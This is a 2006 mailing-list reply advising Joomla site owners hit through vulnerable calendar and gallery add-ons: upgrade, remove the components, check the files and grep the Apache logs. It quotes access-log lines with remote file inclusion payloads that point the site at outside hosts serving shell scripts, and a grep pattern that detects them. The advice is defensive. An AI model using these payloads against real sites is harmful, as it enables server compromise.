alandd@consultpros.com wrote:
> I have been alerted to the fact that the PLUG site is down.  Cracked is
> more likely.  There have been a rash of security problems with Joomla!
> addins.  I thought I patched the calendar but maybe the early fix was not
> good enough.
>
> I have recent backups so I'll have it back as soon as I can.  The current
> calendar component will be going away, however.  I'll install a new one.
>
> Alan
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change  you mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>   
If you're not on version 1.0.10 upgrade now:  
http://www.joomla.org/content/view/1510/74/
I wouldn't be surprised if they make major changes in Joomla to stomp 
out this type of  thing.

In all cases I've had an issue the database was unaffected, only the files.
After the initial panic that I might have been rooted I was relieved 
when I found out how they whacked the index.php and configuration.php 
files on a few of my inactive sites. 

After you restore the site, remove com_extcalendar and com_galeria if 
they're still installed. 
Check the directory structure to make sure they're gone.
Also check your temp directory for strangeness.. like a '.a' directory.

If you check your logs you'll find stuff like this:

    XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
    XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"


I regularly check to see what they're trying to circumvent now by 
grepping for this type of vulnerability in the apache access logs:
/bin/grep mosConfig_absolute_path=http 
/home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack 
attempts' jd@twingeckos.com
The location of your apache logs may be different. If you don't have 
root you can download the logs for your domain and grep them locally.

JD

-- 
JD Austin
Twin Geckos Technology Services LLC
email: jd@twingeckos.com
http://www.twingeckos.com
phone/fax: 480.288.8195